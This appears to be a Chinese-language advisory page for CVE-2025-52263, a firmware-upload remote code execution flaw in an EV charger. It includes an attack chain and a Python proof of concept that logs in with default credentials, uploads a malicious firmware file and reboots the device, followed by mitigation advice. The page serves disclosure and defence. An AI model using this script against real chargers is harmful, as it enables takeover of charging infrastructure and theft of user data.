CVE-2025-52263: Startcharge Artemis AC Charger 固件上传远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-52263

漏洞类型

固件上传远程代码执行

CVSS评分

8.0 高危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Startcharge Artemis AC Charger 7-22 kW v1.0.4

漏洞概述

CVE-2025-52263是Startcharge公司生产的Artemis AC Charger 7-22 kW型号电动汽车充电器Web配置模块中的一个严重安全漏洞。该漏洞存在于v1.0.4版本的固件中，允许已认证的网络相邻攻击者通过Web界面上传精心构造的恶意固件包。由于系统缺乏对上传固件的充分验证机制，攻击者可以利用此漏洞在充电器设备上执行任意代码，从而完全控制受影响设备。鉴于该设备属于关键基础设施中的电动汽车充电设施，此漏洞的潜在影响范围包括设备被恶意操控、充电数据被窃取、甚至可能被用于进一步渗透企业网络的跳板。攻击者需要具备网络相邻位置和低权限凭证即可实施攻击，这大大降低了攻击门槛，使得该漏洞具有较高的实际威胁性。CVSS 3.1评分8.0（高危）反映了该漏洞在机密性、完整性和可用性方面均造成严重影响。

技术细节

该漏洞存在于Startcharge Artemis AC Charger的Web配置管理模块中。漏洞的核心问题在于固件更新功能缺乏充分的安全验证机制。攻击者首先需要获取设备的低权限认证凭证，可通过默认凭证或暴力破解等方式获得。获得凭证后，攻击者可通过Web界面的固件更新功能上传经过特殊构造的恶意固件包。该固件包中嵌入了恶意代码或后门程序。由于系统在接受固件前未对固件完整性、签名和内容进行严格校验，恶意固件会被成功写入设备。设备重启后，攻击者植入的代码将以高权限执行，从而实现远程代码执行（RCE）。攻击者随后可完全控制充电器设备，包括修改充电参数、窃取用户数据、建立持久化后门等操作。由于该设备通常部署在公共场所或企业停车场，攻击者可在物理网络相邻范围内发起攻击，无需互联网访问权限。

攻击链分析

STEP 1

步骤1: 网络侦察

攻击者位于目标网络的相邻位置（如停车场、企业网络），对Startcharge Artemis AC Charger设备进行扫描，发现Web管理接口

STEP 2

步骤2: 凭证获取

攻击者尝试使用默认凭证或通过暴力破解方式获取设备的低权限认证凭据

STEP 3

步骤3: 恶意固件构造

攻击者准备包含恶意代码或后门程序的固件包，该固件可实现远程代码执行、持久化控制等功能

STEP 4

步骤4: 固件上传

使用获取的凭证登录Web配置界面，通过固件更新功能上传恶意固件包

STEP 5

步骤5: 设备重启

触发设备重启，使恶意固件中的代码在设备启动时以高权限执行

STEP 6

步骤6: 远程代码执行

恶意代码成功执行，攻击者获得设备的完全控制权，可进行数据窃取、横向移动等后续攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-52263 PoC - Malicious Firmware Upload
# Note: This is a conceptual PoC for educational purposes only
# Target: Startcharge Artemis AC Charger 7-22 kW v1.0.4

import requests
import json

TARGET_IP = "192.168.1.100"
USERNAME = "admin"
PASSWORD = "admin123"  # Default or weak credentials
FIRMWARE_ENDPOINT = "/api/firmware/upload"

def authenticate(target_ip, username, password):
    """Authenticate to the device web interface"""
    session = requests.Session()
    login_data = {
        "username": username,
        "password": password
    }
    response = session.post(
        f"http://{target_ip}/api/login",
        json=login_data,
        verify=False,
        timeout=10
    )
    return session if response.status_code == 200 else None

def upload_malicious_firmware(session, target_ip, malicious_firmware_path):
    """Upload crafted firmware to trigger RCE"""
    with open(malicious_firmware_path, 'rb') as f:
        files = {'firmware': ('malicious.bin', f, 'application/octet-stream')}
        response = session.post(
            f"http://{target_ip}{FIRMWARE_ENDPOINT}",
            files=files,
            timeout=30
        )
    return response

def trigger_reboot(session, target_ip):
    """Reboot device to execute malicious firmware"""
    response = session.post(
        f"http://{target_ip}/api/system/reboot",
        json={"confirm": True},
        timeout=10
    )
    return response

def main():
    print(f"[*] Targeting {TARGET_IP}")
    print(f"[*] Authenticating...")
    session = authenticate(TARGET_IP, USERNAME, PASSWORD)
    if not session:
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")
    print("[*] Uploading malicious firmware...")
    response = upload_malicious_firmware(session, TARGET_IP, "malicious_firmware.bin")
    if response.status_code == 200:
        print("[+] Firmware uploaded successfully")
        print("[*] Triggering device reboot...")
        trigger_reboot(session, TARGET_IP)
        print("[+] Device rebooted - backdoor should be active")
    else:
        print(f"[-] Upload failed: {response.status_code}")

if __name__ == "__main__":
    main()

影响范围

Startcharge Artemis AC Charger 7-22 kW v1.0.4

防御指南

临时缓解措施

在厂商发布修复补丁前，建议采取以下临时缓解措施：1) 将设备置于独立的网络分段中，限制网络相邻攻击者的可达性；2) 强制使用强密码策略并定期更换凭证；3) 禁用不必要的Web管理功能；4) 启用网络防火墙规则，限制对设备管理端口的访问；5) 监控设备日志以检测异常的上传行为；6) 评估设备是否可暂时离线以降低风险暴露。